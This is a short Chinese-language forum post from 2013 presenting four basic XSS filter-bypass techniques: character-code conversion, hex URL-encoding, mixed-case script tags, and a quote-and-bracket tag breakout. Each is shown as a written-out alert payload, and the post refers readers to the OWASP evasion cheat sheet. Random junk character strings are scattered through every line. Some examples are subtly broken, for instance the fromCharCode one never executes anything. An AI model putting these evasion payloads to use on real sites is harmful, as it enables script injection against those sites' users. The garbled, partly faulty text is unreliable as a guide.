四种超级基础的绕过方法。) B& W0 l: c9 Y& _8 o7 l O
1.转换为ASCII码4 o* P! }% A% M5 E' q8 Y7 x
例子:原脚本为<script>alert(‘I love F4ck’)</script >/ d( b; N$ y4 o' H' s
通过转换,变成:
/ r" z0 I" |# h/ L# f* h<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>0 ?1 h$ ` {7 W- s: L( O! q# @
/ B+ B, P- W* v! x
2.转换为HEX(十六进制)) f+ u* [+ w1 f" @. I s5 O
例子:原脚本为<script>alert(‘I love F4ck’)</script>
4 `3 V5 Y/ a3 @! R- j通过转换,变成: u( {" L! s- r* Q
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e* j/ v2 K& C! j5 I5 u( N
9 B1 |. u- z# \* n) G/ Q; ^3.转换脚本的大小写8 h% ]" o& s2 A2 a
例子:原脚本为<script>alert(‘I love F4ck’)</script>3 a5 J' s' W, Y
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
( @7 \9 |5 J3 a' ^# k
; \+ M" N" i0 y7 k4.增加闭合标记”>
* v3 t/ t7 K$ }" g, f! C; s9 g例子:原脚本为<script>alert(‘I love F4ck’)</script>
/ H F6 L1 j. N转换为:”><script>alert(‘I love F4ck’)</script>
' j6 V8 k; x1 M3 U$ S) j+ Z7 W更详细绕过技术请参考此网页9 S: v+ F% p; I2 o$ D y9 l
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet( k( R) O0 O7 W2 x7 Q0 b
6 L4 i, Y6 T1 \3 ?- s* X% n0 ?转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对